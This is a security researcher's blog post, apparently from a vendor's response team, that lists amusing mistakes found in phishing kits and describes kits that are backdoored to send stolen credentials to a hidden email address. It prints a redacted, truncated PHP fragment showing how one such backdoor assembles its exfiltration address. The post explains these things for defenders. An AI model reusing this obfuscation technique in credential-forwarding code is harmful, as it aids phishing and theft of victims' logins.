Video Screencast Help
Security Response

Phishing for Easter Eggs

Created: 14 Mar 2008 07:00:00 GMT • Updated: 23 Jan 2014 18:41:48 GMT
Candid Wueest's picture
0 0 Votes
Login to vote

There are hundreds of ready-for-use phishing kits available on the Internet. At the beginning of this month, a list with more than 400 links had been circulated on mailing lists and forums. Some kits are a compilation of different sophisticated scripts that can spoof many different brands at once and sometimes even bypass two-factor authentication schemas. However, the vast majority are simply archived copies of the original Web site, modified to include a small PHP script that will send the stolen credentials to an email account.

We know that not all phishers have a Ph.D. in the art of phishing; therefore, you can sometimes find some interesting and funny pieces of code in phishing kits found on the Internet. As Easter is coming up soon, I decided to compile a top five list of the funniest Easter eggs that I have seen in phishing kits lately.

In 5th place: Local image paths
Sometimes, phishers do not check if all links are converted correctly. The lazy approach is to just open up the page locally and see if it renders correctly. Unfortunately, this test does not reveal if there are some images that are displayed correctly but loaded from a local path. The result is a phishing site with missing images and some information revealed about the attacker.

Example:

...img src=“file:///F:/Documents%20and%20Settings/doneminem***/Desktop/cgi-bin/formsloginb_files/fine_privati.gif...

In 4th place: “Saved from” links
Some tools like Internet Explorer add the site’s location to it when you save the page. This makes it easier for you to remember where you downloaded them from. Obviously having such “saved from” links in a phishing site is a dead giveaway that this is a scam page and might also reveal the private stack of scam pages.

Example:

...saved from url=(0055)http://163.XXX.YYY.ZZ/cloz/paypal/accountprocessing...

In 3rd place: Malicious code infected phishing kits
If you play with fire, you get burned. The same applies to phishing, where it gets a little, ummmm, fishy. Phishers often turn off their AV products, if they even have one installed in the first place, because they don’t want the AV product to remove their newest creation. This of course means that they need to know what they are doing, as there are other threats around. So it’s no surprise that we often see infected HTML scam files or phishing archives that contain unwanted malicious code. For example, a French PayPal phishing kit that was infected by a variant of the W32.Rontokbro@mm family, which tends to copy itself to different folders under the folder’s name dot exe. Of course, you might think they did it on purpose, but having an infected phishing site does not really help you to stay under the radar.

In 2nd place: Google Analytics and banner ads
When a phisher does copy an original Web site, he or she usually removes everything that does not really need to be in there and that would give away its location, including images that are mirrored locally. But, some attackers want to make it really realistic (or just didn’t think of it) and leave all links to banner ads in the Web page. In this way, the scammed company can even make a tiny bit of money from the displayed ads. Some phishers even leave the Google Analytics links in the site, so that the real company can later analyze where people came upon this scam site and how effective it was.

And, in 1st place: Convincing backdoors
A huge percentage of those ready to deploy phishing kits are backdoored. This means that the script will send all logged credentials to an additional hidden email account. It’s the story of phishers phishing phishers. Some coders try really hard to disguise their backdoors by covering them as image files or obfuscating the code with JavaScript. The funniest backdoor version I have seen lately was a base64 encoded script, which when decoded produced an array that was used to generate an email address for later use. I removed the name of the email account in the example below, but you can still see that the author is trying to convince the new phisher not to remove this backdoor, as “its good for your scam.” Trust the word of a scammer? I don’t think so.

Example code snippet:

$ar=array("dont"=>"***","remove"=>"***","its"=>"@gm","good"=>"ai","for"=>"l","your"=>".","scam"=>"com");
$er=$ar['dont'].$ar['remove'].$ar['its'].$ar['good'].$ar['for'].$ar['